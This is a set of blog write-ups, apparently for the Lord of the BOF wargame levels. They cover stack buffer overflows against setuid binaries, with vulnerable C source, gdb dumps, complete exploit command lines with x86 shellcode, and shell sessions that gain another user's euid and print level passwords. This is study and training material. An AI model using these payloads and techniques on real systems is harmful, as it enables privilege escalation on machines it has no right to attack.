        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}


I got confused solving this one...

It wipes both argv and envp, so how...?

Seongwoo told me that the program's filename is placed after envp.
This can be used for the BOF.

(That string is the pathname passed to execve, which the kernel copies to the very top of the stack, above the environment strings; it is a separate copy from argv[0], so the memset loop over argv[] does not touch it.)

0xbfffffde:      ""
0xbfffffdf:      ""
0xbfffffe0:      ""
0xbfffffe1:      ""
0xbfffffe2:      ""
0xbfffffe3:      ""
0xbfffffe4:      ""
0xbfffffe5:      ""
0xbfffffe6:      "/home/vampire/tmp/vul"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""

A symbolic link will do: make a link to skeleton whose name is the shellcode and run the program through that name, so the shellcode appears in that pathname string.

0xbfffffe6:      ""
0xbfffffe7:      "/home/vampire/tmp/sa"
0xbffffffc:      ""

(gdb) x/100x 0xbfffffe7
0xbfffffe7:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffff7:     0x61732f70      0x00000000      Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7:      "/home/vampire/tmp/sa"
(gdb)




0xbffffb45:0xbffffef8:

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` $(perl -e 'print "\x90"x44,"\x45\xfb\xff\xbf"')

0xbfffff48

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`

(gdb) x/100x 0xbffffa48
0xbffffa48:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffa58:     0x2f2e2f70      0x90909090      0x90909090      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb18:     0x90909090      0x90909090      0x90909090      0xcee28a68
0xbffffb28:     0x0cb16881      0x6a685453      0x68e48a6f      0x63306901
0xbffffb38:     0x74306968      0x59146a69      0x490c0cfe      0xf741fa79
0xbffffb48:     0x00c354e1      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb58:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb68:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb78:     0xbfbfbfbf      0x00000000      0x00000000      0x00000000
0xbffffb88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc8:     0x00000000      0x00000000      0x00000000      0x00000000



0xbffffef8:      "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0:      '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"


Looking at the stack in gdb, the \xff bytes were not getting through, which is why "stack is still your friend" kept coming up.
I had forgotten that this is Red Hat 6.2.

After switching the shell to bash2 and running it again, it passed right away.

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$





Posted by windowhan




[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

The program now rejects argv[1][46] == 0xff, i.e. any return address of the form 0xbfffXXXX, while still requiring argv[1][47] == 0xbf.
So the return address must look like 0xbfXXXXXX with a third byte other than 0xff.

By default, though, everything on the stack sits at 0xbfffXXXX.
The stack has to be pushed down, by handing the program a very large argument, until the shellcode lands at 0xbffeXXXX or below.



0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %ebp,%esp
0x8048433 <main+3>:     sub    %esp,40
0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   0x8048520
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    %esp,4
0x8048449 <main+25>:    push   0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    %esp,4
0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:    add    %eax,4
0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:    add    %edx,47
0x804845e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x8048461 <main+49>:    je     0x8048480 <main+80>
0x8048463 <main+51>:    push   0x804852c
0x8048468 <main+56>:    call   0x8048350 <printf>
0x804846d <main+61>:    add    %esp,4
0x8048470 <main+64>:    push   0
0x8048472 <main+66>:    call   0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>:    add    %esp,4
0x804847a <main+74>:    lea    %esi,[%esi]
0x8048480 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>:    add    %eax,4
0x8048486 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x8048488 <main+88>:    add    %edx,46
0x804848b <main+91>:    cmp    BYTE PTR [%edx],0xff
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    %esp,4
0x804849d <main+109>:   push   0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    %esp,4
0x80484a7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>:   add    %eax,4
0x80484ad <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    %eax,[%ebp-40]
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    %esp,8
0x80484bc <main+140>:   lea    %eax,[%ebp-40]
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    %esp,8
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop



As for where argv ends up: the longer the arguments are, the lower the address at which they start.

----------              //10 (high addresses)
argv
... etc., ebp, esp
---------
~~
---------
main frame              //1 (low addresses)

Remember that the address is written little-endian: 0xbffe9cb1 goes in as "\xb1\x9c\xfe\xbf", so argv[1][47] is the 0xbf byte that main+46 wants and argv[1][46] is the 0xfe byte that main+91 compares against 0xff.
The argument strings are laid out at the very top of the stack, so every byte added to them pushes argv[2], and the NOP sled inside it, further down; the 90,000-byte dummy argument is what moves it from 0xbfff~~ to 0xbffe~~. The dummy has to be the last argument, as in the run that succeeded below, because it has to sit above the shellcode in memory.

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "a"x90000'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` 

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world


0xbffffc20

0xbffe9c44:

0xbffe4e24
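An added example (written for this page, not code from the post) that pins down the arithmetic behind the two byte checks and the filler. It assumes the frame layout read from the disassembly above: the 40-byte buffer at ebp-40, then the saved ebp, then the return address, so argv[1][44..47] are the little-endian bytes of the return address. The two compares mirror main+46 and main+91; the messages the binary prints on failure are not on this page, so only the printf addresses are noted.

```c
/* Added example: not code from the original post. Models the vampire gate
 * (argv[1][47] == 0xbf at main+46, argv[1][46] != 0xff at main+91) and shows
 * why a return address in 0xbfffxxxx can never pass while 0xbffe9cb1 does. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN     40   /* lea %eax,[%ebp-40] */
#define PAYLOAD_LEN 48   /* 40 buffer + 4 saved ebp + 4 return address */

enum gate { GATE_OK = 0, GATE_STACK = 1, GATE_FOREVER = 2 };

/* argv[1] as the binary sees it: 44 filler bytes, then the return address in
 * x86 little-endian order, so byte 47 is the high byte (0xbf) and byte 46 the
 * second-highest (0xff on the untouched stack, 0xfe once it has been pushed). */
void build_payload(uint32_t ret, uint8_t out[PAYLOAD_LEN]) {
    memset(out, 0xbf, BUF_LEN + 4);            /* "\xbf"x44 */
    out[44] = (uint8_t)(ret);
    out[45] = (uint8_t)(ret >> 8);
    out[46] = (uint8_t)(ret >> 16);
    out[47] = (uint8_t)(ret >> 24);
}

/* The two byte compares from the disassembly, in the order they run. */
enum gate vampire_gate(const uint8_t *argv1) {
    if (argv1[47] != 0xbf) return GATE_STACK;   /* main+46: exit via printf(0x804852c) */
    if (argv1[46] == 0xff) return GATE_FOREVER; /* main+91: exit via printf(0x8048549) */
    return GATE_OK;
}

/* The argument strings sit at the top of the stack; bytes added to them move
 * every lower address down by about the same amount. This is the least number
 * of extra bytes that takes addr below 0xbfff0000, i.e. makes byte 46 != 0xff.
 * At most 0x10000 is ever needed, so the post's 90000-byte dummy argument
 * always suffices (the exact shift also depends on envp, hence "about"). */
uint32_t filler_needed(uint32_t addr) {
    return addr >= 0xbfff0000u ? addr - 0xbffeffffu : 0;
}

int main(void) {
    uint8_t p[PAYLOAD_LEN];
    /* 0xbffffc20 is the address noted in the post; 0xbffe9cb1 the one that worked */
    uint32_t cands[] = { 0xbffffc20u, 0xbffe9cb1u, 0x08048440u };
    for (size_t i = 0; i < sizeof cands / sizeof cands[0]; i++) {
        build_payload(cands[i], p);
        printf("ret=0x%08x bytes[44..47]=%02x %02x %02x %02x gate=%d filler>=%u\n",
               cands[i], p[44], p[45], p[46], p[47],
               (int)vampire_gate(p), filler_needed(cands[i]));
    }
    return 0;
}
```

Byte 46 is the whole story: any address of the form 0xbfffXXXX fails the second check, and 0xbffffc20 needs at least 0xfc21 = 64,545 bytes of extra argument material to drop under 0xbfff0000.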

Posted by windowhan
[orge@localhost orge]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\xd3\xfb\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ouy¿
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
bash$


My hyung told me to use argv[0], so that's what I did...

At first I copied the binary and ran into a lot of trouble, but a symlink did it.
Finally cracked it.


Posted by windowhan

0x8048529 <main+41>:    call   0x80483f0 <strlen>
0x804852e <main+46>:    add    $0x4,%esp
0x8048531 <main+49>:    mov    %eax,%eax
0x8048533 <main+51>:    cmp    $0x4d,%eax
0x8048536 <main+54>:    je     0x8048550 <main+80>
0x8048538 <main+56>:    push   $0x804869c
0x804853d <main+61>:    call   0x8048410 <printf>
0x8048542 <main+66>:    add    $0x4,%esp
0x8048545 <main+69>:    push   $0x0
0x8048547 <main+71>:    call   0x8048420 <exit>
0x804854c <main+76>:    add    $0x4,%esp
0x804854f <main+79>:    nop
0x8048550 <main+80>:    nop
0x8048551 <main+81>:    movl   $0x0,0xffffffd4(%ebp)
0x8048558 <main+88>:    mov    0xffffffd4(%ebp),%eax
0x804855b <main+91>:    lea    0x0(,%eax,4),%edx
0x8048562 <main+98>:    mov    0x80497d4,%eax
0x8048567 <main+103>:   cmpl   $0x0,(%eax,%edx,1)
0x804856b <main+107>:   jne    0x8048570 <main+112>
0x804856d <main+109>:   jmp    0x80485b0 <main+176>
0x804856f <main+111>:   nop
0x8048570 <main+112>:   mov    0xffffffd4(%ebp),%eax
0x8048573 <main+115>:   lea    0x0(,%eax,4),%edx
0x804857a <main+122>:   mov    0x80497d4,%eax
0x804857f <main+127>:   mov    (%eax,%edx,1),%edx
0x8048582 <main+130>:   push   %edx
0x8048583 <main+131>:   call   0x80483f0 <strlen>
0x8048588 <main+136>:   add    $0x4,%esp
0x804858b <main+139>:   mov    %eax,%eax
0x804858d <main+141>:   push   %eax
0x804858e <main+142>:   push   $0x0
0x8048590 <main+144>:   mov    0xffffffd4(%ebp),%eax
0x8048593 <main+147>:   lea    0x0(,%eax,4),%edx
0x804859a <main+154>:   mov    0x80497d4,%eax
0x804859f <main+159>:   mov    (%eax,%edx,1),%edx
0x80485a2 <main+162>:   push   %edx
0x80485a3 <main+163>:   call   0x8048430 <memset>
0x80485a8 <main+168>:   add    $0xc,%esp
0x80485ab <main+171>:   incl   0xffffffd4(%ebp)
0x80485ae <main+174>:   jmp    0x8048558 <main+88>
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   add    $0x2f,%edx
0x80485bb <main+187>:   cmpb   $0xbf,(%edx)
0x80485be <main+190>:   je     0x80485d7 <main+215>
0x80485c0 <main+192>:   push   $0x80486ab
0x80485c5 <main+197>:   call   0x8048410 <printf>
0x80485ca <main+202>:   add    $0x4,%esp
0x80485cd <main+205>:   push   $0x0
0x80485cf <main+207>:   call   0x8048420 <exit>
0x80485d4 <main+212>:   add    $0x4,%esp
0x80485d7 <main+215>:   mov    0xc(%ebp),%eax
0x80485da <main+218>:   add    $0x4,%eax
0x80485dd <main+221>:   mov    (%eax),%edx
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    $0x4,%esp
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    $0x30,%eax
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   $0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    $0x4,%esp
0x80485fc <main+252>:   push   $0x0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    $0x4,%esp
0x8048606 <main+262>:   mov    0xc(%ebp),%eax
0x8048609 <main+265>:   add    $0x4,%eax
0x804860c <main+268>:   mov    (%eax),%edx
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    0xffffffd8(%ebp),%eax
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    $0x8,%esp
0x804861b <main+283>:   lea    0xffffffd8(%ebp),%eax
0x804861e <main+286>:   push   %eax
0x804861f <main+287>:   push   $0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    $0x8,%esp
0x804862c <main+300>:   push   $0x28
0x804862e <main+302>:   push   $0x0
0x8048630 <main+304>:   lea    0xffffffd8(%ebp),%eax
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    $0xc,%esp
0x804863c <main+316>:   leave
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaaa
Starting program: /home/darkelf/tmp///////////////////////////////////////////////////////orge aaaa
argv[0] error

Program exited normally.
(gdb) Quit
(gdb) q
[darkelf@localhost tmp]$ ls
orge  test  test.c
[darkelf@localhost tmp]$ vi test.c
[darkelf@localhost tmp]$ gcc -o test test.c
[darkelf@localhost tmp]$ ./test
76[darkelf@localhost tmp]$ gdb -q /home/darkelf/tmp////////////////////////////////////////////////////////orge
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaa
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge aaa
stack is still your friend.

Program exited normally.
(gdb) `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Undefined command: "".  Try "help".
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿

Breakpoint 1, 0x804863d in main ()
(gdb) x/100x $esp
0xbffff96c:     0xbfbffd6c      0x00000000      0xbffff9b4      0xbffff9c4
0xbffff97c:     0x40013868      0x00000003      0x08048450      0x00000000
0xbffff98c:     0x08048471      0x08048500      0x00000003      0xbffff9b4
0xbffff99c:     0x08048390      0x0804866c      0x4000ae60      0xbffff9ac
0xbffff9ac:     0x40013e90      0x00000003      0xbffffaaa      0xbffffaf8
0xbffff9bc:     0xbffffb29      0x00000000      0xbffffc6e      0xbffffc90
0xbffff9cc:     0xbffffc9a      0xbffffca8      0xbffffcc7      0xbffffcd7
0xbffff9dc:     0xbffffcee      0xbffffd0b      0xbffffd16      0xbffffd24
0xbffff9ec:     0xbffffd67      0xbffffd7a      0xbffffd8f      0xbffffd9f
0xbffff9fc:     0xbffffdac      0xbffffdcb      0xbffffdd6      0xbffffde3
0xbffffa0c:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffa1c:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffa2c:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffa3c:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffa4c:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffa5c:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffa6c:     0x00000010      0x0febfbff      0x0000000f      0xbffffaa5
0xbffffa7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa9c:     0x00000000      0x00000000      0x38366900      0x682f0036
0xbffffaac:     0x2f656d6f      0x6b726164      0x2f666c65      0x2f706d74
0xbffffabc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffacc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffadc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffaec:     0x2f2f2f2f      0x6f2f2f2f      0x00656772      0xbfbfbfbf
(gdb)
0xbffffafc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb0c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb1c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbffd6c      0x90909000
0xbffffb2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x50c03190      0x732f2f68
0xbffffc5c:     0x622f6868      0xe3896e69      0xe1895350      0xcd0bb099
0xbffffc6c:     0x00000080      0x00000000      0x00000000      0x00000000
0xbffffc7c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) Quit
(gdb) q
The program is running.  Exit anyway? (y or n) y
[darkelf@localhost tmp]$ ./home/darkelf/tmp/////////////////////////////////////
bash: ./home/darkelf/tmp///////////////////////////////////////////////////////o
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
stack is still your friend.
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .////////////////////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œû
Illegal instruction (core dumped)
[darkelf@localhost tmp]$ bash2
[darkelf@localhost tmp]$ `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash2: ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿: command not found
[darkelf@localhost tmp]$
[darkelf@localhost tmp]$ .////////////////////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ exit
exit
[darkelf@localhost tmp]$ cd ../
[darkelf@localhost darkelf]$ .////////////////////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker
bash$
bash$
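An added example, written for this page and not the challenge's own source, that reconstructs the gate of orge from the disassembly above and the slash-padding trick the session uses to pass it. Assumptions: the table at 0x80497d4 that the loop at main+88..174 walks is environ (each entry is memset to zero); the "argv[0] error" and "stack is still your friend." strings are the ones echoed in the session above, the third message is not on the page and is only referenced by its printf address; the directory and file name in main() are the ones the session used.

```c
/* Added example, not from the original post: the checks orge's main performs,
 * as read from the disassembly, and the argv[0] padding trick used against it. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARGV0_LEN 0x4d  /* main+51:  cmp $0x4d,%eax  -> strlen(argv[0]) must be 77 */
#define ARGV1_MAX 0x30  /* main+234: cmp $0x30,%eax ; jbe -> strlen(argv[1]) <= 48 */
#define BUF_LEN   40    /* main+271: lea 0xffffffd8(%ebp) -> buffer is ebp-40 */

enum gate { GATE_OK = 0, GATE_ARGV0 = 1, GATE_STACK = 2, GATE_TOO_LONG = 3 };

/* Checks in the order main runs them: argv[0] length, (environ wipe),
 * argv[1][47], argv[1] length, then strcpy into the 40-byte buffer. The binary
 * reads argv[1][47] without looking at the length first; here a short string
 * is rejected instead of being read past its end. */
enum gate orge_gate(const char *argv0, const char *argv1) {
    if (strlen(argv0) != ARGV0_LEN) return GATE_ARGV0;          /* "argv[0] error" */
    if (strlen(argv1) < 48 || (unsigned char)argv1[47] != 0xbf)
        return GATE_STACK;                                       /* "stack is still your friend." */
    if (strlen(argv1) > ARGV1_MAX) return GATE_TOO_LONG;        /* printf(0x80486c8), text not on page */
    return GATE_OK;
}

/* Zero every environment string, as the loop at main+88..174 does (assumed to
 * walk environ). Returns how many entries were wiped. */
size_t wipe_env(char **envp) {
    size_t n = 0;
    for (; envp[n] != NULL; n++) memset(envp[n], 0, strlen(envp[n]));
    return n;
}

/* "dir" + slashes + "name", exactly `want` bytes. The kernel collapses the
 * repeated '/' when it resolves the path, but argv[0] keeps them verbatim, so
 * the program still runs and strlen(argv[0]) is whatever we chose. */
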